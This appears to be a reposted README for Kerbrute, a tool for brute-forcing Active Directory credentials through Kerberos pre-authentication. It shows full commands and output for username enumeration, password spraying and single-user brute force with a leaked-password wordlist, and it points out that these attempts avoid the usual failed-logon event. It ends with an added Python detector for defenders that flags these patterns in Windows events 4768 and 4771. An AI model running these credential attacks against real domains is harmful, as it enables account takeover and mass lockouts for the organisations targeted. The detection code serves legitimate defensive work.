Kerbrute – A Tool To Perform Kerberos Pre-Auth Bruteforcing
Kerberos pre-authentication failures do not trigger the usual "An account failed to log on" event (ID 4625). With Kerberos, you can validate a username or test a login by sending only one UDP frame to the KDC (Domain Controller).
Usage
Kerbrute has three main commands:
- bruteuser – Bruteforce a single user’s password from a wordlist
- passwordspray – Test a single password against a list of users
- userenum – Enumerate valid domain usernames via Kerberos
A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given, the KDC will be looked up via DNS.
By default, Kerbrute is multithreaded and uses 10 threads. This can be changed with the -t option.
Output is logged to stdout, but a log file can be specified with -o.
By default, failures are not logged, but that can be changed with -v.
Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts.
The help command can be used for more information:
c:\Python37>kerbrute_windows_amd64.exe

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

c:\Python37>
User Enumeration
To enumerate usernames, Kerbrute sends TGT requests with no pre-authentication. If the KDC responds with a PRINCIPAL UNKNOWN error, the username does not exist. If the KDC instead prompts for pre-authentication, we know the username exists and we move on. This does not cause any login failures, so it will not lock out any accounts. It does generate Windows event ID 4768 if Kerberos logging is enabled.
c:\Python37>kerbrute_windows_amd64.exe userenum --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

2020/05/22 14:07:55 >  Using KDC(s):
2020/05/22 14:07:55 >   offline.kingofthe.domain:88

2020/05/22 14:07:55 >  [+] VALID USERNAME:  poki@kingofthe.domain
2020/05/22 14:07:55 >  [+] VALID USERNAME:  guest@kingofthe.domain
2020/05/22 14:07:55 >  [+] VALID USERNAME:  lily@kingofthe.domain
2020/05/22 14:07:55 >  [+] VALID USERNAME:  yvonne@kingofthe.domain
2020/05/22 14:07:55 >  [+] VALID USERNAME:  toast@kingofthe.domain
2020/05/22 14:07:55 >  [+] VALID USERNAME:  administrator@kingofthe.domain
2020/05/22 14:07:55 >  Done! Tested 7 usernames (6 valid) in 0.083 seconds
Password Spray
With passwordspray, Kerbrute will perform a horizontal brute force attack against a list of domain users. This is useful for testing one or two common passwords when you have a large list of users. WARNING: this will increment the failed login count and lock out accounts. It will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested – and 4771 – Kerberos pre-authentication failed.
c:\Python37>kerbrute_windows_amd64.exe passwordspray --dc offline.kingofthe.domain -d kingofthe.domain usernames.txt lolily

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

2020/05/22 14:21:51 >  Using KDC(s):
2020/05/22 14:21:51 >   offline.kingofthe.domain:88

2020/05/22 14:21:51 >  [+] VALID LOGIN:  lily@kingofthe.domain:lolily
2020/05/22 14:21:51 >  Done! Tested 7 logins (1 successes) in 0.124 seconds
Brute User
This is a traditional bruteforce attack against a single username. Only run this if you are sure there is no lockout policy! It will generate both event IDs 4768 – A Kerberos authentication ticket (TGT) was requested – and 4771 – Kerberos pre-authentication failed.
c:\Python37>kerbrute_windows_amd64.exe bruteuser --dc offline.kingofthe.domain -d kingofthe.domain darkweb2017-top1000.txt lily

Version: v1.0.3 (9dad6e1) - 05/22/20 - Ronnie Flathers @ropnop

2020/05/22 14:27:20 >  Using KDC(s):
2020/05/22 14:27:20 >   offline.kingofthe.domain:88

2020/05/22 14:27:21 >  [+] VALID LOGIN:  lily@kingofthe.domain:lolily
2020/05/22 14:27:21 >  Done! Tested 225 logins (1 successes) in 1.278 seconds
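As an added, defender-side example that is not part of Kerbrute or its README, the Python below applies the event-ID facts from the User Enumeration, Password Spray and Brute User sections to a constructed set of Windows Security events: 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN) for enumeration misses, 4771 with 0x18 (KDC_ERR_PREAUTH_FAILED) for bad passwords, and 4771 with 0x12 (KDC_ERR_CLIENT_REVOKED) for the lockout that --safe watches for. The client IPs, account names and the threshold of three are assumptions.

```python
from collections import defaultdict

# Kerberos result codes as they appear in the Security log (RFC 4120 error codes).
PRINCIPAL_UNKNOWN = "0x6"   # 4768: KDC_ERR_C_PRINCIPAL_UNKNOWN, the name does not exist
PREAUTH_FAILED = "0x18"     # 4771: KDC_ERR_PREAUTH_FAILED, wrong password for a real user
CLIENT_REVOKED = "0x12"     # 4771: KDC_ERR_CLIENT_REVOKED, account is locked out

# Constructed sample records: (event_id, account, client_ip, result_code).
SAMPLE_EVENTS = [
    (4768, "bob", "10.0.0.5", "0x6"),      # three unknown names from one client
    (4768, "carol", "10.0.0.5", "0x6"),    # looks like userenum
    (4768, "dave", "10.0.0.5", "0x6"),
    (4768, "lily", "10.0.0.5", "0x0"),     # a normal, successful TGT request
    (4771, "lily", "10.0.0.9", "0x18"),    # one bad password against many users
    (4771, "poki", "10.0.0.9", "0x18"),    # looks like passwordspray
    (4771, "toast", "10.0.0.9", "0x18"),
    (4771, "lily", "10.0.0.7", "0x18"),    # many bad passwords against one user
    (4771, "lily", "10.0.0.7", "0x18"),    # looks like bruteuser
    (4771, "lily", "10.0.0.7", "0x18"),
    (4771, "lily", "10.0.0.7", "0x12"),    # ...until the account locks out
]

def analyze(events, threshold=3):
    """Return {(finding, client_ip): sorted account names} for suspicious clients."""
    unknown = defaultdict(set)    # client -> names the KDC did not know (4768 / 0x6)
    failed = defaultdict(list)    # client -> accounts with a pre-auth failure (4771 / 0x18)
    locked = defaultdict(set)     # client -> accounts that came back locked out (4771 / 0x12)
    for event_id, account, client, code in events:
        if event_id == 4768 and code == PRINCIPAL_UNKNOWN:
            unknown[client].add(account)
        elif event_id == 4771 and code == PREAUTH_FAILED:
            failed[client].append(account)
        elif event_id == 4771 and code == CLIENT_REVOKED:
            locked[client].add(account)
    findings = {}
    for client, names in unknown.items():
        if len(names) >= threshold:
            findings[("username_enumeration", client)] = sorted(names)
    for client, attempts in failed.items():
        distinct = set(attempts)
        # A spray touches many accounts once each; a brute force hits one account repeatedly.
        if len(distinct) >= threshold:
            findings[("password_spray", client)] = sorted(distinct)
        elif len(attempts) >= threshold:
            findings[("single_user_bruteforce", client)] = sorted(distinct)
    for client, names in locked.items():
        findings[("lockout", client)] = sorted(names)
    return findings
```

A production rule would add a time window per client and exclude known scanners; the sample omits both to keep the three patterns visible.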
Installing
You can download pre-compiled binaries for Linux, Windows and Mac from the releases page. If you want to live on the edge, you can also install with Go:
$ go get github.com/ropnop/kerbrute
With the repository cloned, you can also use the Makefile to compile for common architectures:
$ make help
help: Show this help.
windows: Make Windows x86 and x64 Binaries
linux: Make Linux x86 and x64 Binaries
mac: Make Darwin (Mac) x86 and x64 Binaries
clean: Delete any binaries
all: Make Windows, Linux and Mac x86/x64 Binaries
$ make all
Done.
Building for windows amd64..
Building for windows 386..
Done.
Building for linux amd64...
Building for linux 386...
Done.
Building for mac amd64...
Building for mac 386...
Done.
$ ls dist/
kerbrute_darwin_386 kerbrute_linux_386 kerbrute_windows_386.exe
kerbrute_darwin_amd64 kerbrute_linux_amd64 kerbrute_windows_amd64.exe
Credits
To jcmturner for his pure Go implementation of KRB5 (https://github.com/jcmturner/gokrb5), an amazing project.